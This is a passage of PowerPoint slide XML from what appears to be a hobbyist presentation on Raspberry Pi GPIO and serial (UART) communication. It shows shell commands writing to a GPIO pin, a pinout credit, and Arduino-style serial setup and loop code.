              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>gpio4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>echo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="808080"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>"0"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>sys</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>class</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>gpio</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>gpio4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New"/>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1259960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Killer </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rounded Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="304801" y="1771518"/>
            <a:ext cx="7620000" cy="4627880"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:ln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110" y="4345744"/>
            <a:ext cx="1343790" cy="114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65017" y="2717394"/>
            <a:ext cx="2082799" cy="1190171"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln cap="rnd">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:round/>
          </a:ln>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57" y="1912246"/>
            <a:ext cx="1858245" cy="425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rot="10800000" flipV="1">
            <a:off x="1981203" y="2413517"/>
            <a:ext cx="4190997" cy="654468"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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a:off x="3241041" y="3053079"/>
            <a:ext cx="2392680" cy="340362"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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V="1">
            <a:off x="3810000" y="3787984"/>
            <a:ext cx="2409280" cy="631616"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100200"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFC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a:off x="4607564" y="2026920"/>
            <a:ext cx="2555239" cy="386600"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100497"/>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H="1">
            <a:off x="3452130" y="3416556"/>
            <a:ext cx="2006079" cy="2"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>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934681" y="3195022"/>
            <a:ext cx="1617042" cy="162262"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -2150"/>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a:off x="4455171" y="5334000"/>
            <a:ext cx="802629" cy="241036"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -633"/>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rot="16200000" flipH="1">
            <a:off x="4001987" y="4319222"/>
            <a:ext cx="1708998" cy="802631"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 17302"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="254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rot="5400000">
            <a:off x="-647700" y="3924300"/>
            <a:ext cx="3733802" cy="914402"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -4422"/>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p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="762000" y="5334000"/>
            <a:ext cx="3505200" cy="914402"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val -434"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FF0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2611372" y="4135372"/>
            <a:ext cx="2138978" cy="258278"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 100423"/>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1905000" y="3581400"/>
            <a:ext cx="1418119" cy="381000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 5225"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFC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6200000" flipH="1">
            <a:off x="3009899" y="4305301"/>
            <a:ext cx="1371602" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 133042"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>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4038600" y="3886200"/>
            <a:ext cx="2209800" cy="568494"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 286"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln w="25400" cap="rnd">
            <a:solidFill>
              <a:srgbClr val="00B050"/>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80919" y="6518977"/>
            <a:ext cx="4916731" cy="276999"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t>RPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>Pinout</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1" smtClean="0"/>
              <a:t>bogarted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>://elinux.org/RPi_Low-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>level_peripherals</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="4724400"/>
            <a:ext cx="2057400" cy="769441"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fixed!</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3774795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Source and Demo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectangle 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2514600" y="5715000"/>
            <a:ext cx="39167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dirty="0"/>
              <a:t>Demo Time!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="3" name="Table 2"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1544269597"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="990600" y="1524000"/>
          <a:ext cx="6934200" cy="3261359"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="6934200"/>
              </a:tblGrid>
              <a:tr h="0">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>// This line defines a "</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>Uart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>" object to access the serial port </a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="008000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>HardwareSerial</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>Uart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </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dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>HardwareSerial</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dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>void</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> setup</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b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>Uart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>begin</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>115200</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>);</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>}</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="3600" dirty="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>void</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> loop</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b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="8000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>char</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>incomingByte</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="808080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>if</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>Uart</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>available</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b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="0000FF"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000080"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="Courier New"/>
                        </a:rPr>
                        <a:t>{</a:t>
                      </a:r>
                      <a:br>
                        <a:rPr lang="en-US" sz="1600" b="1" dirty="0">
                          <a:solidFill>
